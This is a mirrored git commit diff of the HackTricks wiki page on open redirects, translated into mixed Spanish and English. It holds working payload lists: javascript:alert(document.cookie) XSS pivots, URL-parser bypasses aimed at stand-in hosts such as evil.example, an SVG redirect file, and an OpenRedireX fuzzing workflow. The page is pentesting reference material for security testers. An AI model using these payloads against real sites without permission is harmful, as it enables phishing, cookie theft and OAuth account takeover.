mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
Translated ['src/pentesting-web/open-redirect.md'] to es
This commit is contained in:
parent
89b3c7d386
commit
8c441ed615
@ -1,18 +1,29 @@
|
||||
# Redirección Abierta
|
||||
# Open Redirect
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
||||
|
||||
## Redirección Abierta
|
||||
## Open redirect
|
||||
|
||||
### Redirección a localhost o dominios arbitrarios
|
||||
### Redirect to localhost or arbitrary domains
|
||||
|
||||
- Si la app “allows only internal/whitelisted hosts”, prueba notaciones alternativas de host para alcanzar loopback o rangos internos vía el redirect target:
|
||||
- IPv4 loopback variants: 127.0.0.1, 127.1, 2130706433 (decimal), 0x7f000001 (hex), 017700000001 (octal)
|
||||
- IPv6 loopback variants: [::1], [0:0:0:0:0:0:0:1], [::ffff:127.0.0.1]
|
||||
- Trailing dot and casing: localhost., LOCALHOST, 127.0.0.1.
|
||||
- Wildcard DNS that resolves to loopback: lvh.me, sslip.io (e.g., 127.0.0.1.sslip.io), traefik.me, localtest.me. Estos son útiles cuando solo se permiten “subdomains of X” pero la resolución del host sigue apuntando a 127.0.0.1.
|
||||
- Network-path references often bypass naive validators that prepend a scheme or only check prefixes:
|
||||
- //attacker.tld → interpreted as scheme-relative and navigates off-site with the current scheme.
|
||||
- Userinfo tricks defeat contains/startswith checks against trusted hosts:
|
||||
- https://trusted.tld@attacker.tld/ → el navegador navega a attacker.tld pero simples comprobaciones de cadena “ven” trusted.tld.
|
||||
- Backslash parsing confusion between frameworks/browsers:
|
||||
- https://trusted.tld\@attacker.tld → algunos backends tratan “\” como un caracter de path y pasan la validación; browsers normalizan a “/” e interpretan trusted.tld como userinfo, enviando usuarios a attacker.tld. Esto también aparece en mismatches de Node/PHP URL-parser.
|
||||
|
||||
{{#ref}}
|
||||
ssrf-server-side-request-forgery/url-format-bypass.md
|
||||
{{#endref}}
|
||||
|
||||
### Redirección Abierta a XSS
|
||||
### Modern open-redirect to XSS pivots
|
||||
```bash
|
||||
#Basic payload, javascript code is executed after "javascript:"
|
||||
javascript:alert(1)
|
||||
@ -58,7 +69,36 @@ javascript://whitelisted.com?%a0alert%281%29
|
||||
/x:1/:///%01javascript:alert(document.cookie)/
|
||||
";alert(0);//
|
||||
```
|
||||
## Open Redirect subiendo archivos svg
|
||||
<details>
|
||||
<summary>Payloads modernos de bypass basados en URL</summary>
|
||||
```text
|
||||
# Scheme-relative (current scheme is reused)
|
||||
//evil.example
|
||||
|
||||
# Credentials (userinfo) trick
|
||||
https://trusted.example@evil.example/
|
||||
|
||||
# Backslash confusion (server validates, browser normalizes)
|
||||
https://trusted.example\@evil.example/
|
||||
|
||||
# Schemeless with whitespace/control chars
|
||||
evil.example%00
|
||||
%09//evil.example
|
||||
|
||||
# Prefix/suffix matching flaws
|
||||
https://trusted.example.evil.example/
|
||||
https://evil.example/trusted.example
|
||||
|
||||
# When only path is accepted, try breaking absolute URL detection
|
||||
/\\evil.example
|
||||
/..//evil.example
|
||||
```
|
||||
|
||||
```
|
||||
</details>
|
||||
|
||||
## Open Redirect uploading svg files
|
||||
|
||||
```html
|
||||
<code>
|
||||
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
|
||||
@ -68,7 +108,9 @@ xmlns="http://www.w3.org/2000/svg">
|
||||
</svg>
|
||||
</code>
|
||||
```
|
||||
## Parámetros de inyección comunes
|
||||
|
||||
## Common injection parameters
|
||||
|
||||
```
|
||||
/{payload}
|
||||
?next={payload}
|
||||
@ -143,17 +185,23 @@ RedirectUrl=https://c1h2e1.github.io
|
||||
Redirect=https://c1h2e1.github.io
|
||||
ReturnUrl=https://c1h2e1.github.io
|
||||
```
|
||||
## Ejemplos de código
|
||||
|
||||
## Code examples
|
||||
|
||||
#### .Net
|
||||
|
||||
```bash
|
||||
response.redirect("~/mysafe-subdomain/login.aspx")
|
||||
```
|
||||
|
||||
#### Java
|
||||
|
||||
```bash
|
||||
response.redirect("http://mysafedomain.com");
|
||||
```
|
||||
|
||||
#### PHP
|
||||
|
||||
```php
|
||||
<?php
|
||||
/* browser redirections*/
|
||||
@ -161,16 +209,75 @@ header("Location: http://mysafedomain.com");
|
||||
exit;
|
||||
?>
|
||||
```
|
||||
|
||||
## Hunting and exploitation workflow (practical)
|
||||
|
||||
- Single URL check with curl:
|
||||
|
||||
```bash
|
||||
curl -s -I "https://target.tld/redirect?url=//evil.example" | grep -i "^Location:"
|
||||
```
|
||||
|
||||
- Discover and fuzz likely parameters at scale:
|
||||
|
||||
<details>
|
||||
<summary>Click to expand</summary>
|
||||
|
||||
```bash
|
||||
# 1) Recopila URLs históricas, conserva aquellas con parámetros comunes de redirección
|
||||
cat domains.txt \
|
||||
| gau --o urls.txt # or: waybackurls / katana / hakrawler
|
||||
|
||||
# 2) Grep parámetros comunes y normaliza la lista
|
||||
rg -NI "(url=|next=|redir=|redirect|dest=|rurl=|return=|continue=)" urls.txt \
|
||||
| sed 's/\r$//' | sort -u > candidates.txt
|
||||
|
||||
# 3) Usa OpenRedireX para fuzz con un corpus de payloads
|
||||
cat candidates.txt | openredirex -p payloads.txt -k FUZZ -c 50 > results.txt
|
||||
|
||||
# 4) Verifica manualmente los resultados interesantes
|
||||
awk '/30[1237]|Location:/I' results.txt
|
||||
```
|
||||
```
|
||||
</details>
|
||||
|
||||
- No olvides los sinks del lado cliente en SPAs: busca window.location/assign/replace y los helpers del framework que leen query/hash y redirigen.
|
||||
|
||||
- Los frameworks a menudo introducen footguns cuando los destinos de redirección se derivan de input no confiable (query params, Referer, cookies). See Next.js notes about redirects and avoid dynamic destinations derived from user input.
|
||||
|
||||
{{#ref}}
|
||||
../network-services-pentesting/pentesting-web/nextjs.md
|
||||
{{#endref}}
|
||||
|
||||
- OAuth/OIDC flows: abusar de open redirectors frecuentemente escala a account takeover por leaking de authorization codes/tokens. Consulta la guía dedicada:
|
||||
|
||||
{{#ref}}
|
||||
./oauth-to-account-takeover.md
|
||||
{{#endref}}
|
||||
|
||||
- Las respuestas del servidor que implementan redirects sin Location (meta refresh/JavaScript) siguen siendo explotables para phishing y a veces pueden encadenarse. Grep for:
|
||||
```html
|
||||
<meta http-equiv="refresh" content="0;url=//evil.example">
|
||||
<script>location = new URLSearchParams(location.search).get('next')</script>
|
||||
```
|
||||
## Herramientas
|
||||
|
||||
- [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer)
|
||||
- OpenRedireX – fuzzer para detectar open redirects. Ejemplo:
|
||||
```bash
|
||||
# Install
|
||||
git clone https://github.com/devanshbatham/OpenRedireX && cd OpenRedireX && ./setup.sh
|
||||
|
||||
## Recursos
|
||||
# Fuzz a list of candidate URLs (use FUZZ as placeholder)
|
||||
cat list_of_urls.txt | ./openredirex.py -p payloads.txt -k FUZZ -c 50
|
||||
```
|
||||
## Referencias
|
||||
|
||||
- En [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) puedes encontrar listas de fuzzing.
|
||||
- En https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect puedes encontrar listas de fuzzing.
|
||||
- [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)
|
||||
- [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads)
|
||||
- [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)
|
||||
|
||||
- PortSwigger Web Security Academy – DOM-based open redirection: https://portswigger.net/web-security/dom-based/open-redirection
|
||||
- OpenRedireX – Un fuzzer para detectar open redirect vulnerabilities: https://github.com/devanshbatham/OpenRedireX
|
||||
|
||||
{{#include ../banners/hacktricks-training.md}}
|
||||
|
Loading…
x
Reference in New Issue
Block a user